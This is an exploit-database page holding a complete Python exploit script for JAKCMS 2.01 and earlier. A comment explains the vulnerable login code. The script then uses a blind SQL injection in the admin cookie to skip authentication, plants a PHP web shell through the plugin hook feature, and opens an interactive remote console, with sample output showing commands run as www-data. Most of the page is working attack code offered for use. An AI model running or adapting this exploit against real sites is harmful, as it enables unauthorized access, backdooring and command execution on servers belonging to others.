Vulners
Lucene search
JAKCMS 2.01 - Code Execution
#!/usr/bin/python
#
# JAKCMS <= v2.01 Code Execution Exploit
# Explanation:
#
# During the authentication process, a check is performed to ensure that the user accessing the page is not already logged in.
# This process is done by validating the cookies set in the browser as 'JAK_COOKIE_NAME' and 'JAK_COOKIE_PASS'. If the cookies
# are found to be set, then an SQL statement is executed to help validate if the user is logged in. This functionaility contains
# a blind SQL Injection vulnerability, triggerable through both the 'JAK_COOKIE_NAME' and 'JAK_COOKIE_PASS' variables.
#
# If a valid query is provided and it returns a result set, then the user is granted access to the administrative console by setting
# the session variable 'JAKLoggedIn' to true. Below is a snippet of code from the 'class/class.userlogin.php' page on lines 65-76
# highlighting the vulnerable code.
#
# public static function jakChecklogged()
# {
# global $jakdb;
# if ((isset($_COOKIE['JAK_COOKIE_NAME']) && isset($_COOKIE['JAK_COOKIE_PASS'])) || isset($_SESSION['JAKLoggedIn'])) {
# $sql = 'SELECT * FROM '.DB_PREFIX.'user WHERE ((username = "'.COOKIE_NAME.'" AND password = "'.COOKIE_PASS.'") OR (sessi$
# $result = $jakdb->query($sql);
# if ($jakdb->affected_rows > 0) {
# $row = $result->fetch_assoc();
# $_SESSION['JAKLoggedIn'] = true;
#
# Additionally, functionality in the backend, allows an administrative user to add a "php_hook" whereby adding php content to a
# page on the website. This allows an attacker essentially backdoor the website in a single request.
#
# [mr_me@pluto jak]$ python jakcmsCodeExecution.py -p localhost:8080 -t 192.168.1.7 -d /webapps/jak/
#
# | ------------------------------------------- |
# | JAKcms <= v2.01 0day Code Execution Explo!t |
# | by mr_me - net-ninja.net ------------------ |
#
# (+) Testing proxy @ localhost:8080.. proxy is found to be working!
# (+) Targeting http://192.168.1.7/
# (!) Exploit working!
# (+) Entering interactive remote console (q for quit)
#
# [email protected]# id
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
#
# [email protected]# uname -a
# Linux steven-desktop 2.6.32-28-generic #55-Ubuntu SMP Mon Jan 10 21:21:01 UTC 2011 i686 GNU/Linux
#
# [email protected]# q
import sys
import urllib
import re
import urllib2
import getpass
import base64
from optparse import OptionParser
usage = "./%prog [<options>] -t [target] -d [directory]"
usage += "\nExample: ./%prog -p localhost:8080 -t 192.168.1.7 -d /webapps/jak/"
parser = OptionParser(usage=usage)
parser.add_option("-p", type="string",action="store", dest="proxy",
help="HTTP Proxy <server:port>")
parser.add_option("-t", type="string", action="store", dest="target",
help="The Target server <server:port>")
parser.add_option("-d", type="string", action="store", dest="dirPath",
help="Directory path to the CMS")
(options, args) = parser.parse_args()
def banner():
print "\n\t| -------------------------------------- |"
print "\t| JAKcms <= v2.01 Code Execution Explo!t |"
print "\t| by mr_me - net-ninja.net ------------- |\n"
if len(sys.argv) < 5:
banner()
parser.print_help()
sys.exit(1)
def testProxy():
check = 1
sys.stdout.write("(+) Testing proxy @ %s.. " % (options.proxy))
sys.stdout.flush()
try:
req = urllib2.Request("http://www.google.com/")
req.set_proxy(options.proxy,"http")
check = urllib2.urlopen(req)
except:
check = 0
pass
if check != 0:
sys.stdout.write("proxy is found to be working!\n")
sys.stdout.flush()
else:
print "proxy failed, exiting.."
sys.exit(1)
def interactiveAttack():
print "(+) Entering interactive remote console (q for quit)\n"
hn = "%s@%s# " % (getpass.getuser(), options.target)
preBaseCmd = ""
while preBaseCmd != 'q':
preBaseCmd = raw_input(hn)
cmd64 = base64.b64encode(preBaseCmd)
cmdResp = getServerResponse(options.target + options.dirPath + "index.php?p=sitemap&lol=" + cmd64, "", "")
result = cmdResp.split("<!DOCTYPE html")[0]
print result
def getServerResponse(exploit, header=None, data=None):
try:
if header != None:
headers = {}
headers['Cookie'] = header
if data != None:
data = urllib.urlencode(data)
req = urllib2.Request("http://"+exploit, data, headers)
if options.proxy:
req.set_proxy(options.proxy,"http")
check = urllib2.urlopen(req).read()
except urllib.error.HTTPError, error:
check = error.read()
except urllib.error.URLError:
print "(-) Target connection failed, check your address"
sys.exit(1)
return check
def doEvilRequest():
print "(+) Targeting http://%s/" % (options.target)
phpShell = "system(base64_decode($_GET['lol']));"
req = options.target + options.dirPath + "admin/index.php?p=plugins&sp=newhook"
funnycookie = "JAK_COOKIE_PASS=test; JAK_COOKIE_NAME=admin\"))+and+1=1--+;"
data = {'jak_name':'lol', 'jak_hook':'php_sitemap', 'jak_plugin':'0', 'jak_exorder':'1', 'jak_phpcode': phpShell}
check = getServerResponse(req, funnycookie, data)
if re.search("Successful", check):
print "(!) Exploit working!"
interactiveAttack()
else:
print "(-) Exploit failed, exiting.."
sys.exit(1)
def main():
banner()
if options.proxy:
testProxy()
doEvilRequest()
if __name__ == "__main__":
main()Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
20 Feb 2011 00:00Current
7.4High risk
Vulners AI Score7.4